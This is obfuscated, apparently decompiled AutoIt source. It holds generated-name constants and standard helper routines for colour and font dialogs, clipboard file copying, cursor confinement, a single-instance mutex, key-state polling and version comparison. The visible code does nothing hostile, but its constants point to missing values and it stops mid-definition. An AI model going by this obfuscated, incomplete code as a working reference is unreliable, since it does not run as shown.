- GLOBAL CONST $Var02C4 =NUMBER($Var02C5 )
- GLOBAL CONST $Var02C6 =NUMBER($Var02C7 )
- GLOBAL CONST $Var02C8 =NUMBER($Var02C9 )
- GLOBAL CONST $Var02CA =NUMBER($Var02CB )
- GLOBAL CONST $Var02CC =NUMBER($Var02CD )
- GLOBAL CONST $Var02CE =NUMBER($Var02CF )
- GLOBAL CONST $Var02D0 =NUMBER($Var02D1 )
- GLOBAL CONST $Var02D2 =NUMBER($Var02D3 )
- GLOBAL CONST $Var02D4 =NUMBER($Var02D5 )
- GLOBAL CONST $Var02D6 =NUMBER($Var02D7 )
- GLOBAL CONST $Var02D8 =NUMBER($Var02D9 )
- GLOBAL CONST $Var02DA =NUMBER($Var02DB )
- GLOBAL CONST $Var02DC =NUMBER($Var02DD )
- GLOBAL CONST $Var02DE =NUMBER($Var02DF )
- GLOBAL CONST $Var02E0 =NUMBER($Var02E1 )
- GLOBAL CONST $Var02E2 =NUMBER($Var02E3 )
- GLOBAL CONST $Var02E4 =NUMBER($Var02E5 )
- GLOBAL CONST $Var02E6 =NUMBER($Var02E7 )
- GLOBAL CONST $Var02E8 =NUMBER($Var02E9 )
- GLOBAL CONST $Var02EA =NUMBER($Var02EB )
- GLOBAL CONST $Var02EC =NUMBER($Var02ED )
- GLOBAL CONST $Var02EE =NUMBER($Var02EF )
- GLOBAL CONST $Var02F0 =NUMBER($Var02F1 )
- GLOBAL CONST $Var02F2 =NUMBER($Var02F3 )
- GLOBAL CONST $Var02F4 =NUMBER($Var02F5 )
- GLOBAL CONST $Var02F6 =NUMBER($Var02F7 )
- GLOBAL CONST $Var02F8 =NUMBER($Var02F9 )
- GLOBAL CONST $Var02FA =NUMBER($Var02FB )
- GLOBAL CONST $Var02FC =NUMBER($Var02FD )
- GLOBAL CONST $Var02FE =NUMBER($Var02FF )
- GLOBAL CONST $Var0300 =NUMBER($Var0301 )
- GLOBAL CONST $Var0302 =NUMBER($Var0303 )
- GLOBAL CONST $Var0304 =NUMBER($Var0305 )
- GLOBAL CONST $Var0306 =NUMBER($Var0307 )
- GLOBAL CONST $Var0308 =NUMBER($Var0309 )
- GLOBAL CONST $Var030A =NUMBER($Var030B )
- GLOBAL CONST $Var030C =NUMBER($Var030D )
- GLOBAL CONST $Var030E =NUMBER($Var030F )
- GLOBAL CONST $Var0310 =NUMBER($Var0311 )
- GLOBAL CONST $Var0312 =NUMBER($Var0313 )
- GLOBAL CONST $Var0314 =NUMBER($Var0315 )
- GLOBAL CONST $Var0316 =NUMBER($Var0317 )
- GLOBAL CONST $Var0318 =NUMBER($Var0319 )
- GLOBAL CONST $Var031A =NUMBER($Var031B )
- GLOBAL CONST $Var031C =NUMBER($Var031D )
- GLOBAL CONST $Var031E =NUMBER($Var031F )
- GLOBAL CONST $Var0320 =NUMBER($Var0321 )
- GLOBAL CONST $Var0322 =NUMBER($Var0323 )
- GLOBAL CONST $Var0324 =NUMBER($Var0325 )
- GLOBAL CONST $Var0326 =NUMBER($Var0327 )
- GLOBAL CONST $Var0328 =NUMBER($Var0329 )
- GLOBAL CONST $Var032A =NUMBER($Var032B )
- GLOBAL CONST $Var032C =NUMBER($Var032D )
- GLOBAL CONST $Var032E =NUMBER($Var032F )
- GLOBAL CONST $Var0330 =NUMBER($Var0331 )
- GLOBAL CONST $Var0332 =NUMBER($Var0333 )
- GLOBAL CONST $Var0334 =NUMBER($Var0335 )
- GLOBAL CONST $Var0336 =NUMBER($Var0337 )
- GLOBAL CONST $Var0338 =NUMBER($Var0339 )
- GLOBAL CONST $Var033A =NUMBER($Var033B )
- GLOBAL CONST $Var033C =BITOR($Var0304 ,$Var0306 )
- GLOBAL CONST $Var033D =$Var033C
- GLOBAL CONST $Var033E =NUMBER($Var033F )
- GLOBAL CONST $Var0340 =NUMBER($Var0341 )
- GLOBAL CONST $Var0342 =NUMBER($Var0343 )
- GLOBAL CONST $Var0344 =$Var0308
- GLOBAL CONST $Var0345 =$Var030C
- GLOBAL CONST $Var0346 =$Var0312
- GLOBAL CONST $Var0347 =$Var030E
- GLOBAL CONST $Var0348 =$Var0314
- GLOBAL CONST $Var0349 =$Var0316
- GLOBAL CONST $Var034A =$Var031A
- GLOBAL CONST $Var034B =$Var031C
- GLOBAL CONST $Var034C =$Var031E
- GLOBAL CONST $Var034D =$Var0324
- GLOBAL CONST $Var034E =$Var0328
- GLOBAL CONST $Var034F =$Var032A
- GLOBAL CONST $Var0350 =$Var032E
- GLOBAL CONST $Var0351 =$Var0330
- GLOBAL CONST $Var0352 =$Var0334
- GLOBAL CONST $Var0353 =$Var0338
- GLOBAL CONST $Var0354 =$Var033E
- GLOBAL CONST $Var0355 =NUMBER($Var0356 )
- GLOBAL CONST $Var0357 =NUMBER($Var0358 )
- GLOBAL CONST $Var0359 =NUMBER($Var035A )
- GLOBAL CONST $Var035B =NUMBER($Var035C )
- GLOBAL CONST $Var035D =NUMBER($Var035E )
- GLOBAL CONST $Var035F =NUMBER($Var0360 )
- GLOBAL CONST $Var0361 =$Var035F
- GLOBAL CONST $Var0362 =NUMBER($Var0363 )
- GLOBAL CONST $Var0364 =NUMBER($Var0365 )
- GLOBAL CONST $Var0366 =NUMBER($Var0367 )
- GLOBAL CONST $Var0368 =NUMBER($Var0369 )
- GLOBAL CONST $Var036A =NUMBER($Var036B )
- GLOBAL CONST $Var036C =NUMBER($Var036D )
- GLOBAL CONST $Var036E =NUMBER($Var036F )
- GLOBAL CONST $Var0370 =NUMBER($Var0371 )
- GLOBAL CONST $Var0372 =NUMBER($Var0373 )
- GLOBAL CONST $Var0374 =NUMBER($Var0375 )
- GLOBAL CONST $Var0376 =NUMBER($Var0377 )
- GLOBAL CONST $Var0378 =NUMBER($Var0379 )
- GLOBAL CONST $Var037A =NUMBER($Var037B )
- GLOBAL CONST $Var037C =NUMBER($Var037D )
- GLOBAL CONST $Var037E =NUMBER($Var037F )
- GLOBAL CONST $Var0380 =NUMBER($Var0381 )
- GLOBAL CONST $Var0382 =NUMBER($Var0383 )
- GLOBAL CONST $Var0384 =NUMBER($Var0385 )
- GLOBAL CONST $Var0386 =NUMBER($Var0387 )
- GLOBAL CONST $Var0388 =NUMBER($Var0389 )
- GLOBAL CONST $Var038A =NUMBER($Var038B )
- GLOBAL CONST $Var038C =NUMBER($Var038D )
- GLOBAL CONST $Var038E =NUMBER($Var038F )
- GLOBAL CONST $Var0390 =NUMBER($Var0391 )
- GLOBAL CONST $Var0392 =NUMBER($Var0393 )
- GLOBAL CONST $Var0394 =NUMBER($Var0395 )
- GLOBAL CONST $Var0396 =NUMBER($Var0397 )
- GLOBAL CONST $Var0398 =NUMBER($Var0399 )
- GLOBAL CONST $Var039A =NUMBER($Var039B )
- GLOBAL CONST $Var039C =NUMBER($Var039D )
- GLOBAL CONST $Var039E =NUMBER($Var039F )
- GLOBAL CONST $Var03A0 =NUMBER($Var03A1 )
- GLOBAL CONST $Var03A2 =NUMBER($Var03A3 )
- GLOBAL CONST $Var03A4 =NUMBER($Var03A5 )
- GLOBAL CONST $Var03A6 =NUMBER($Var03A7 )
- GLOBAL CONST $Var03A8 =NUMBER($Var03A9 )
- GLOBAL CONST $Var03AA =NUMBER($Var03AB )
- GLOBAL CONST $Var03AC =NUMBER($Var03AD )
- GLOBAL CONST $Var03AE =NUMBER($Var03AF )
- GLOBAL CONST $Var03B0 =NUMBER($Var03B1 )
- GLOBAL CONST $Var03B2 =NUMBER($Var03B3 )
- GLOBAL CONST $Var03B4 =NUMBER($Var03B5 )
- GLOBAL CONST $Var03B6 =NUMBER($Var03B7 )
- GLOBAL CONST $Var03B8 =NUMBER($Var03B9 )
- GLOBAL CONST $Var03BA =NUMBER($Var03BB )
- GLOBAL CONST $Var03BC =NUMBER($Var03BD )
- GLOBAL CONST $Var03BE =NUMBER($Var03BF )
- GLOBAL CONST $Var03C0 =NUMBER($Var03C1 )
- GLOBAL CONST $Var03C2 =NUMBER($Var03C3 )
- GLOBAL CONST $Var03C4 =NUMBER($Var03C5 )
- GLOBAL CONST $Var03C6 =NUMBER($Var03C7 )
- GLOBAL CONST $Var03C8 =NUMBER($Var03C9 )
- GLOBAL CONST $Var03CA =BITSHIFT($Var03BA ,NUMBER($Var03CB ))
- GLOBAL CONST $Var03CC =BITSHIFT($Var03BC ,NUMBER($Var03CD ))
- GLOBAL CONST $Var03CE =BITSHIFT($Var03BE ,NUMBER($Var03CF ))
- GLOBAL CONST $Var03D0 =BITSHIFT($Var03C0 ,NUMBER($Var03D1 ))
- GLOBAL CONST $Var03D2 =BITSHIFT($Var03C2 ,NUMBER($Var03D3 ))
- GLOBAL CONST $Var03D4 =BITSHIFT($Var03C4 ,NUMBER($Var03D5 ))
- GLOBAL CONST $Var03D6 =BITSHIFT($Var03C6 ,NUMBER($Var03D7 ))
- GLOBAL CONST $Var03D8 =BITSHIFT($Var03C8 ,NUMBER($Var03D9 ))
- GLOBAL CONST $Var03DA =NUMBER($Var03DB )
- GLOBAL CONST $Var03DC =NUMBER($Var03DD )
- GLOBAL CONST $Var03DE =NUMBER($Var03DF )
- GLOBAL CONST $Var03E0 =NUMBER($Var03E1 )
- GLOBAL CONST $Var03E2 =NUMBER($Var03E3 )
- GLOBAL CONST $Var03E4 =NUMBER($Var03E5 )
- GLOBAL CONST $Var03E6 =NUMBER($Var03E7 )
- GLOBAL CONST $Var03E8 =NUMBER($Var03E9 )
- GLOBAL CONST $Var03EA =NUMBER($Var03EB )
- GLOBAL CONST $Var03EC =NUMBER($Var03ED )
- GLOBAL CONST $Var03EE =NUMBER($Var03EF )
- GLOBAL CONST $Var03F0 =NUMBER($Var03F1 )
- GLOBAL CONST $Var03F2 =NUMBER($Var03F3 )
- GLOBAL CONST $Var03F4 =NUMBER($Var03F5 )
- GLOBAL CONST $Var03F6 =NUMBER($Var03F7 )
- GLOBAL CONST $Var03F8 =NUMBER($Var03F9 )
- GLOBAL CONST $Var03FA =NUMBER($Var03FB )
- GLOBAL CONST $Var03FC =NUMBER($Var03FD )
- GLOBAL CONST $Var03FE =NUMBER($Var03FF )
- GLOBAL CONST $Var0400 =NUMBER($Var0401 )
- GLOBAL CONST $Var0402 =NUMBER($Var0403 )
- GLOBAL CONST $Var0404 =NUMBER($Var0405 )
- GLOBAL CONST $Var0406 =NUMBER($Var0407 )
- GLOBAL CONST $Var0408 =NUMBER($Var0409 )
- GLOBAL CONST $Var040A =NUMBER($Var040B )
- GLOBAL CONST $Var040C =NUMBER($Var040D )
- GLOBAL CONST $Var040E =NUMBER($Var040F )
- GLOBAL CONST $Var0410 =NUMBER($Var0411 )
- GLOBAL CONST $Var0412 =NUMBER($Var0413 )
- GLOBAL CONST $Var0414 =NUMBER($Var0415 )
- GLOBAL CONST $Var0416 =NUMBER($Var0417 )
- GLOBAL CONST $Var0418 =NUMBER($Var0419 )
- GLOBAL CONST $Var041A =NUMBER($Var041B )
- GLOBAL CONST $Var041C =NUMBER($Var041D )
- GLOBAL CONST $Var041E =NUMBER($Var041F )
- GLOBAL CONST $Var0420 =NUMBER($Var0421 )
- GLOBAL CONST $Var0422 =NUMBER($Var0423 )
- GLOBAL CONST $Var0424 =NUMBER($Var0425 )
- GLOBAL CONST $Var0426 =NUMBER($Var0427 )
- GLOBAL CONST $Var0428 =NUMBER($Var0429 )
- GLOBAL CONST $Var042A =NUMBER($Var042B )
- GLOBAL CONST $Var042C =NUMBER($Var042D )
- GLOBAL CONST $Var042E =NUMBER($Var042F )
- GLOBAL CONST $Var0430 =NUMBER($Var0431 )
- GLOBAL CONST $Var0432 =NUMBER($Var0433 )
- GLOBAL CONST $Var0434 =NUMBER($Var0435 )
- GLOBAL CONST $Var0436 =NUMBER($Var0437 )
- GLOBAL CONST $Var0438 =NUMBER($Var0439 )
- GLOBAL CONST $Var043A =NUMBER($Var043B )
- GLOBAL CONST $Var043C =NUMBER($Var043D )
- GLOBAL CONST $Var043E =NUMBER($Var043F )
- GLOBAL CONST $Var0440 =NUMBER($Var0441 )
- GLOBAL CONST $Var0442 =NUMBER($Var0443 )
- GLOBAL CONST $Var0444 =NUMBER($Var0445 )
- GLOBAL CONST $Var0446 =NUMBER($Var0447 )
- GLOBAL CONST $Var0448 =NUMBER($Var0449 )
- GLOBAL CONST $Var044A =NUMBER($Var044B )
- GLOBAL CONST $Var044C =NUMBER($Var044D )
- GLOBAL CONST $Var044E =NUMBER($Var044F )
- GLOBAL CONST $Var0450 =NUMBER($Var0451 )
- GLOBAL CONST $Var0452 =NUMBER($Var0453 )
- GLOBAL CONST $Var0454 =NUMBER($Var0455 )
- GLOBAL CONST $Var0456 =NUMBER($Var0457 )
- GLOBAL CONST $Var0458 =NUMBER($Var0459 )
- GLOBAL CONST $Var045A =NUMBER($Var045B )
- GLOBAL CONST $Var045C =NUMBER($Var045D )
- GLOBAL CONST $Var045E =NUMBER($Var045F )
- GLOBAL CONST $Var0460 =NUMBER($Var0461 )
- GLOBAL CONST $Var0462 =NUMBER($Var0463 )
- GLOBAL CONST $Var0464 =NUMBER($Var0465 )
- GLOBAL CONST $Var0466 =NUMBER($Var0467 )
- GLOBAL CONST $Var0468 =NUMBER($Var0469 )
- GLOBAL CONST $Var046A =NUMBER($Var046B )
- GLOBAL CONST $Var046C =NUMBER($Var046D )
- GLOBAL CONST $Var046E =NUMBER($Var046F )
- GLOBAL CONST $Var0470 =NUMBER($Var0471 )
- GLOBAL CONST $Var0472 =NUMBER($Var0473 )
- GLOBAL CONST $Var0474 =NUMBER($Var0475 )
- GLOBAL CONST $Var0476 =NUMBER($Var0477 )
- GLOBAL CONST $Var0478 =NUMBER($Var0479 )
- GLOBAL CONST $Var047A =NUMBER($Var047B )
- GLOBAL CONST $Var047C =NUMBER($Var047D )
- GLOBAL CONST $Var047E =NUMBER($Var047F )
- GLOBAL CONST $Var0480 =NUMBER($Var0481 )
- GLOBAL CONST $Var0482 =NUMBER($Var0483 )
- GLOBAL CONST $Var0484 =NUMBER($Var0485 )
- GLOBAL CONST $Var0486 =NUMBER($Var0487 )
- GLOBAL CONST $Var0488 =NUMBER($Var0489 )
- GLOBAL CONST $Var048A =NUMBER($Var048B )
- GLOBAL CONST $Var048C =NUMBER($Var048D )
- GLOBAL CONST $Var048E =NUMBER($Var048F )
- GLOBAL CONST $Var0490 =NUMBER($Var0491 )
- GLOBAL CONST $Var0492 =NUMBER($Var0493 )
- GLOBAL CONST $Var0494 =NUMBER($Var0495 )
- GLOBAL CONST $Var0496 =NUMBER($Var0497 )
- GLOBAL CONST $Var0498 =$Var0499 &$Var049A
- GLOBAL CONST $Var049B =$Var049C &$Var049D
- Func Fn00FF($ArgOpt00=0,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0)
- LOCAL $Local0079 ="dword[16]"
- LOCAL $Local007A =DLLSTRUCTCREATE($Var0498 )
- LOCAL $Local007B =DLLSTRUCTCREATE($Local0079 )
- IF $ArgOpt02= 1 THEN
- $ArgOpt01=INT($ArgOpt01)
- ELSEIF $ArgOpt02= 2 THEN
- $ArgOpt01=HEX(STRING($ArgOpt01), 6 )
- $ArgOpt01="0x" &STRINGMID($ArgOpt01, 5 , 2 )&STRINGMID($ArgOpt01, 3 , 2 )&STRINGMID($ArgOpt01, 1 , 2 )
- ENDIF
- DLLSTRUCTSETDATA($Local007A ,"Size" ,DLLSTRUCTGETSIZE($Local007A ))
- DLLSTRUCTSETDATA($Local007A ,"hWndOwnder",$ArgOpt03)
- DLLSTRUCTSETDATA($Local007A ,"rgbResult" ,$ArgOpt01)
- DLLSTRUCTSETDATA($Local007A ,"CustColors",DLLSTRUCTGETPTR($Local007B ))
- DLLSTRUCTSETDATA($Local007A ,"Flags" ,BITOR($Var0492 ,$Var0494 ,$Var0496 ))
- LOCAL $Local000E =DLLCALL("comdlg32.dll","bool" ,"ChooseColor","struct*" ,$Local007A )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- IF $Local000E [ 0 ]= 0 THEN RETURN SETERROR(- 3 ,- 3 ,- 1 )
- LOCAL $Local007C =DLLSTRUCTGETDATA($Local007A ,"rgbResult" )
- IF $ArgOpt00= 1 THEN
- RETURN "0x" &HEX(STRING($Local007C ), 6 )
- ELSEIF $ArgOpt00= 2 THEN
- $Local007C =HEX(STRING($Local007C ), 6 )
- RETURN "0x" &STRINGMID($Local007C , 5 , 2 )&STRINGMID($Local007C , 3 , 2 )&STRINGMID($Local007C , 1 , 2 )
- ELSEIF $ArgOpt00= 0 THEN
- RETURN $Local007C
- ELSE
- RETURN SETERROR(- 4 ,- 4 ,- 1 )
- ENDIF
- ENDFUNC
- Func Fn0100($ArgOpt00="Courier New",$ArgOpt01=10,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=FALSE ,$ArgOpt05=FALSE ,$ArgOpt06=FALSE ,$ArgOpt07=0)
- LOCAL $Local007D = 0 ,$Var049E = 0 ,$Var049F = 0
- LOCAL $Local007E =Fn0107( 0 )
- LOCAL $Local007F =ROUND(($ArgOpt01*Fn0108($Local007E ,$Var0432 ))/0x0048 , 0 )
- Fn0109( 0 ,$Local007E )
- LOCAL $Local0080 =DLLSTRUCTCREATE($Var049B )
- LOCAL $Local0081 =DLLSTRUCTCREATE($Var04A0 )
- DLLSTRUCTSETDATA($Local0080 ,"Size" ,DLLSTRUCTGETSIZE($Local0080 ))
- DLLSTRUCTSETDATA($Local0080 ,"hWndOwner" ,$ArgOpt07)
- DLLSTRUCTSETDATA($Local0080 ,"LogFont" ,DLLSTRUCTGETPTR($Local0081 ))
- DLLSTRUCTSETDATA($Local0080 ,"PointSize" ,$ArgOpt01)
- DLLSTRUCTSETDATA($Local0080 ,"Flags" ,BITOR($Var042C ,$Var042A ,$Var0428 ,$Var0430 ,$Var042E ))
- DLLSTRUCTSETDATA($Local0080 ,"rgbColors" ,$ArgOpt02)
- DLLSTRUCTSETDATA($Local0080 ,"FontType" , 0 )
- DLLSTRUCTSETDATA($Local0081 ,"Height" ,$Local007F )
- DLLSTRUCTSETDATA($Local0081 ,"Weight" ,$ArgOpt03)
- DLLSTRUCTSETDATA($Local0081 ,"Italic" ,$ArgOpt04)
- DLLSTRUCTSETDATA($Local0081 ,"Underline" ,$ArgOpt05)
- DLLSTRUCTSETDATA($Local0081 ,"Strikeout" ,$ArgOpt06)
- DLLSTRUCTSETDATA($Local0081 ,"FaceName" ,$ArgOpt00)
- LOCAL $Local000E =DLLCALL("comdlg32.dll","bool" ,"ChooseFontW","struct*" ,$Local0080 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- IF $Local000E [ 0 ]= 0 THEN RETURN SETERROR(- 3 ,- 3 ,- 1 )
- LOCAL $Local0082 =DLLSTRUCTGETDATA($Local0081 ,"FaceName" )
- IF STRINGLEN($Local0082 )= 0 AND STRINGLEN($ArgOpt00)> 0 THEN $Local0082 =$ArgOpt00
- IF DLLSTRUCTGETDATA($Local0081 ,"Italic" )THEN $Local007D = 2
- IF DLLSTRUCTGETDATA($Local0081 ,"Underline" )THEN $Var049E = 4
- IF DLLSTRUCTGETDATA($Local0081 ,"Strikeout" )THEN $Var049F = 8
- LOCAL $Local0083 =BITOR($Local007D ,$Var049E ,$Var049F )
- LOCAL $Local0084 =DLLSTRUCTGETDATA($Local0080 ,"PointSize" )/ 10
- LOCAL $Local0085 =DLLSTRUCTGETDATA($Local0080 ,"rgbColors" )
- LOCAL $Local0086 =DLLSTRUCTGETDATA($Local0081 ,"Weight" )
- LOCAL $Local007C =HEX(STRING($Local0085 ), 6 )
- RETURN STRINGSPLIT($Local0083 &"," &$Local0082 &"," &$Local0084 &"," &$Local0086 &"," &$Local0085 &"," &"0x" &$Local007C &"," &"0x" &STRINGMID($Local007C , 5 , 2 )&STRINGMID($Local007C , 3 , 2 )&STRINGMID($Local007C , 1 , 2 ),"," )
- ENDFUNC
- Func Fn0101($Arg00,$ArgOpt01="|")
- LOCAL CONST $Var016E = 2 ,$Var01DE =0x000F
- $Arg00&=$ArgOpt01&$ArgOpt01
- LOCAL $Local0087 = 2 *(STRINGLEN($Arg00)+0x0014 )
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"OpenClipboard","hwnd" , 0 )
- IF @ERROR OR $Local000E [ 0 ]= 0 THEN RETURN SETERROR( 1 ,A1000604D34(),FALSE )
- LOCAL $Local0053 = 0 ,$Local0054 = 0
- $Local000E =DLLCALL("user32.dll","bool" ,"EmptyClipboard")
- IF @ERROR OR NOT $Local000E [ 0 ]THEN
- $Local0053 = 2
- $Local0054 =A1000604D34()
- ELSE
- $Local000E =DLLCALL("kernel32.dll","handle" ,"GlobalAlloc","uint" ,$Var016E ,"ulong_ptr" ,$Local0087 )
- IF @ERROR OR NOT $Local000E [ 0 ]THEN
- $Local0053 = 3
- $Local0054 =A1000604D34()
- ELSE
- LOCAL $Local0088 =$Local000E [ 0 ]
- $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalLock","handle" ,$Local0088 )
- IF @ERROR OR NOT $Local000E [ 0 ]THEN
- $Local0053 = 4
- $Local0054 =A1000604D34()
- ELSE
- LOCAL $Local0089 =$Local000E [ 0 ]
- LOCAL $Local008A =DLLSTRUCTCREATE("dword pFiles;"&$Var010E &";bool fNC;bool fWide;wchar["&STRINGLEN($Arg00)+ 1 &"]" ,$Local0089 )
- IF @ERROR THEN RETURN SETERROR( 5 , 6 ,FALSE )
- LOCAL $Local008B =DLLSTRUCTCREATE("dword;long;long;bool;bool")
- DLLSTRUCTSETDATA($Local008A ,"pFiles" ,DLLSTRUCTGETSIZE($Local008B ))
- DLLSTRUCTSETDATA($Local008A ,"X" , 0 )
- DLLSTRUCTSETDATA($Local008A ,"Y" , 0 )
- DLLSTRUCTSETDATA($Local008A ,"fNC" , 0 )
- DLLSTRUCTSETDATA($Local008A ,"fWide" , 1 )
- DLLSTRUCTSETDATA($Local008A , 6 ,$Arg00)
- FOR $Local00EB = 1 TO STRINGLEN($Arg00)
- IF DLLSTRUCTGETDATA($Local008A , 6 ,$Local00EB )=$ArgOpt01 THEN DLLSTRUCTSETDATA($Local008A , 6 ,CHR( 0 ),$Local00EB )
- NEXT
- $Local000E =DLLCALL("user32.dll","handle" ,"SetClipboardData","uint" ,$Var01DE ,"handle" ,$Local0088 )
- IF @ERROR OR NOT $Local000E [ 0 ]THEN
- $Local0053 = 6
- $Local0054 =A1000604D34()
- ENDIF
- $Local000E =DLLCALL("kernel32.dll","bool" ,"GlobalUnlock","handle" ,$Local0088 )
- IF (@ERROR OR NOT $Local000E [ 0 ])AND NOT $Local0053 AND A1000604D34()THEN
- $Local0053 = 8
- $Local0054 =A1000604D34()
- ENDIF
- ENDIF
- $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalFree","handle" ,$Local0088 )
- IF (@ERROR OR $Local000E [ 0 ])AND NOT $Local0053 THEN
- $Local0053 = 9
- $Local0054 =A1000604D34()
- ENDIF
- ENDIF
- ENDIF
- $Local000E =DLLCALL("user32.dll","bool" ,"CloseClipboard")
- IF (@ERROR OR NOT $Local000E [ 0 ])AND NOT $Local0053 THEN RETURN SETERROR( 7 ,A1000604D34(),FALSE )
- IF $Local0053 THEN RETURN SETERROR($Local0053 ,$Local0054 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0102($Arg00,$Arg01,$Arg02)
- IF $Arg00 THEN
- RETURN $Arg01
- ELSE
- RETURN $Arg02
- ENDIF
- ENDFUNC
- Func Fn0103($ArgOpt00=0,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0)
- LOCAL $Local000E
- IF @NumParams == 0 THEN
- $Local000E =DLLCALL("user32.dll","bool" ,"ClipCursor","ptr" , 0 )
- IF @ERROR OR NOT $Local000E [ 0 ]THEN RETURN SETERROR( 1 ,A1000604D34(),FALSE )
- ELSE
- IF @NumParams == 2 THEN
- $ArgOpt02=$ArgOpt00+ 1
- $ArgOpt03=$ArgOpt01+ 1
- ENDIF
- LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
- DLLSTRUCTSETDATA($Local0017 ,"Left" ,$ArgOpt00)
- DLLSTRUCTSETDATA($Local0017 ,"Top" ,$ArgOpt01)
- DLLSTRUCTSETDATA($Local0017 ,"Right" ,$ArgOpt02)
- DLLSTRUCTSETDATA($Local0017 ,"Bottom" ,$ArgOpt03)
- $Local000E =DLLCALL("user32.dll","bool" ,"ClipCursor","struct*" ,$Local0017 )
- IF @ERROR OR NOT $Local000E [ 0 ]THEN RETURN SETERROR( 2 ,A1000604D34(),FALSE )
- ENDIF
- RETURN TRUE
- ENDFUNC
- Func Fn0104($Arg00,$ArgOpt01=0)
- LOCAL CONST $Var04A1 =0x00B7
- LOCAL CONST $Var04A2 = 1
- LOCAL $Local008C = 0
- IF BITAND($ArgOpt01, 2 )THEN
- LOCAL $Local008D =DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
- LOCAL $Local008E =DLLCALL("advapi32.dll","bool" ,"InitializeSecurityDescriptor","struct*" ,$Local008D ,"dword" ,$Var04A2 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local008E [ 0 ]THEN
- $Local008E =DLLCALL("advapi32.dll","bool" ,"SetSecurityDescriptorDacl","struct*" ,$Local008D ,"bool" , 1 ,"ptr" , 0 ,"bool" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local008E [ 0 ]THEN
- $Local008C =DLLSTRUCTCREATE($Var04A3 )
- DLLSTRUCTSETDATA($Local008C , 1 ,DLLSTRUCTGETSIZE($Local008C ))
- DLLSTRUCTSETDATA($Local008C , 2 ,DLLSTRUCTGETPTR($Local008D ))
- DLLSTRUCTSETDATA($Local008C , 3 , 0 )
- ENDIF
- ENDIF
- ENDIF
- LOCAL $Local008F =DLLCALL("kernel32.dll","handle" ,"CreateMutexW","struct*" ,$Local008C ,"bool" , 1 ,"wstr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local0090 =DLLCALL("kernel32.dll","dword" ,"GetLastError")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local0090 [ 0 ]=$Var04A1 THEN
- IF BITAND($ArgOpt01, 1 )THEN
- RETURN SETERROR($Local0090 [ 0 ],$Local0090 [ 0 ], 0 )
- ELSE
- EXIT - 1
- ENDIF
- ENDIF
- RETURN $Local008F [ 0 ]
- ENDFUNC
- Func Fn0105($Arg00,$ArgOpt01="user32.dll")
- LOCAL $Local0091 =DLLCALL($ArgOpt01,"short" ,"GetAsyncKeyState","int" ,"0x" &$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN BITAND($Local0091 [ 0 ],0x8000 )<> 0
- ENDFUNC
- Func Fn0106($Arg00,$Arg01)
- IF $Arg00=$Arg01 THEN RETURN 0
- LOCAL $Local0092 ="."
- IF STRINGINSTR($Arg00,$Local0092 )= 0 THEN $Local0092 =","
- LOCAL $Local0093 =STRINGSPLIT($Arg00,$Local0092 )
- LOCAL $Local0094 =STRINGSPLIT($Arg01,$Local0092 )
- IF UBOUND($Local0093 )<>UBOUND($Local0094 )OR UBOUND($Local0093 )= 0 THEN
- SETEXTENDED( 1 )
- IF $Arg00>$Arg01 THEN
- RETURN 1
- ELSEIF $Arg00<$Arg01 THEN
- RETURN - 1
- ENDIF
- ELSE
- FOR $Local00EB = 1 TO UBOUND($Local0093 )- 1
- IF STRINGISDIGIT($Local0093 [$Local00EB ])AND STRINGISDIGIT($Local0094 [$Local00EB ])THEN
- IF NUMBER($Local0093 [$Local00EB ])>NUMBER($Local0094 [$Local00EB ])THEN
- RETURN 1
- ELSEIF NUMBER($Local0093 [$Local00EB ])<NUMBER($Local0094 [$Local00EB ])THEN
- RETURN - 1
- ENDIF
- ELSE
- SETEXTENDED( 1 )
- IF $Local0093 [$Local00EB ]>$Local0094 [$Local00EB ]THEN
- RETURN 1
- ELSEIF $Local0093 [$Local00EB ]<$Local0094 [$Local00EB ]THEN
- RETURN - 1
- ENDIF
- ENDIF
- NEXT
- ENDIF
- RETURN SETERROR( 2 , 0 , 0 )
- ENDFUNC
- Func Fn0107($Arg00)
- LOCAL $Local000E =DLLCALL("User32.dll","handle" ,"GetDC" ,"hwnd" ,$Arg00)
- IF @ERROR OR NOT $Local000E [ 0 ]THEN RETURN SETERROR( 1 ,A1000604D34(), 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0108($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("GDI32.dll" ,"int" ,"GetDeviceCaps","handle" ,$Arg00,"int" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0109($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("User32.dll","int" ,"ReleaseDC" ,"hwnd" ,$Arg00,"handle" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]<> 0
- ENDFUNC
- GLOBAL CONST $Var04A4 =NUMBER($Var04A5 )
- GLOBAL CONST $Var04A6 =NUMBER($Var04A7 )
- GLOBAL CONST $Var04A8 =NUMBER($Var04A9 )
- GLOBAL CONST $Var04AA =NUMBER($Var04AB )
- GLOBAL CONST $Var04AC =NUMBER($Var04AD )
- GLOBAL CONST $Var04AE =NUMBER($Var04AF )
- GLOBAL $Var04B0 [$Var04A6 ][$Var04AA +$Var04A4 +NUMBER($Var04B1 )]
- Func Fn010A($Arg00)
